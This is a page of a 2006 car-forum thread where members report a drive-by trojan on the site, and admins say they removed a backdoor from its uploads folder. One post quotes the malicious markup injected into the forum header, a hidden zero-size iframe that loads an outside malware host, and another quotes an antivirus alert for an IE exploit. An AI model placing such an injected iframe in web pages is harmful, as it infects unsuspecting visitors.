PranK Posted July 5, 2006 Share Posted July 5, 2006 Ok, there was a backdoor file in our /uploads dir which has now been removed and will stop any re-occurance of this issue. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2308007 Share on other sites More sharing options...
Duncan Posted July 5, 2006 Share Posted July 5, 2006 yeah all good for me Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2308068 Share on other sites More sharing options...
sewid Posted July 6, 2006 Share Posted July 6, 2006 Just visited a thread then and got two different redirections opening up. 196.regvista.com or something and another one which i didnt catch in time. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2311666 Share on other sites More sharing options...
ish Posted July 7, 2006 Share Posted July 7, 2006 u will keep getting picked off till you address who ever has a backdoor on Admin. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2311701 Share on other sites More sharing options...
R31Nismoid Posted July 7, 2006 Share Posted July 7, 2006 yep... problem is back again Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2311744 Share on other sites More sharing options...
TracidTrax Posted July 7, 2006 Share Posted July 7, 2006 so this is y my IE kept locking up last week, everytime i came onto SAU IE would just lock up all is good now Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2311762 Share on other sites More sharing options...
ookami Posted July 7, 2006 Share Posted July 7, 2006 Its back .. happened first thing this morning again. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2311772 Share on other sites More sharing options...
Munkyb0y Posted July 7, 2006 Share Posted July 7, 2006 Yep, just got it too. removed the url in case someone decided to click on it that's the source according to my a/v Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2312981 Share on other sites More sharing options...
Mr-Toy33 Posted July 7, 2006 Share Posted July 7, 2006 Got the following message from my Norton Antivirus when coming to the site just now. Intrusion: HTTP MSIE CreateTextRange Code Exec. Intruder: 196.regvista.com(85.255.115.196)(http(80)). Risk Level: High. Protocol: TCP. Attack IP: detzol(192.168.1.169). Attacked Port: 1275. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313151 Share on other sites More sharing options...
Mr-Toy33 Posted July 7, 2006 Share Posted July 7, 2006 just looking at the source code that i can see of the index.php file. look at the header files for the forum, you'll find there is this code "<iframe src="http://196.regvista.com/index.php?ref=nu" width="0" height="0" frameborder="0"></iframe>" in there somewhere which is calling on the site which holds the trogan file to infect pc's from this site. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313163 Share on other sites More sharing options...
Mcleod Posted July 7, 2006 Share Posted July 7, 2006 Hi, I've logged into Admin CP and removed the thing that keeps trying to send the trojan to people. I beleive PranK is overseas atm so best I stepped in and helped out.. - Mcleod Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313187 Share on other sites More sharing options...
Skitza Posted July 7, 2006 Share Posted July 7, 2006 Still there Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313743 Share on other sites More sharing options...
R31Nismoid Posted July 7, 2006 Share Posted July 7, 2006 Yeah, definately not fixed Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313752 Share on other sites More sharing options...
R33S2 Posted July 7, 2006 Share Posted July 7, 2006 Got me today as well. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313948 Share on other sites More sharing options...
wilch Posted July 7, 2006 Share Posted July 7, 2006 Well the trojan forced me to move to Firefox. Didn't think I ever would. But now I don't think I'll go back to IE. Hurrah for firefox extensions. It sucks that some corporations won't allow the usage of firefox though. Hell, we've been putting Mozilla Firefox in the IBM build since Firefox 1.0.1 or something. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2313952 Share on other sites More sharing options...
Dump_Pipe Posted July 8, 2006 Share Posted July 8, 2006 I just got done again with the virus today as well. Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2314197 Share on other sites More sharing options...
allblitz Posted July 8, 2006 Share Posted July 8, 2006 Its still there Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2314708 Share on other sites More sharing options...
braadz Posted July 9, 2006 Share Posted July 9, 2006 it really fkd up 2 of my computers, work & home.. i had to format both then i came on again, and i got it again, IE errors etc all over the place Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2315603 Share on other sites More sharing options...
ish Posted July 9, 2006 Share Posted July 9, 2006 A format is not required to remove this trojan / Virus Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2315610 Share on other sites More sharing options...
Mr Italy! Posted July 9, 2006 Share Posted July 9, 2006 Got me again just then.... So is this thing actually doing damage to my PC? Link to comment https://www.sau.com.au/forums/topic/124535-trojans/page/4/#findComment-2316408 Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now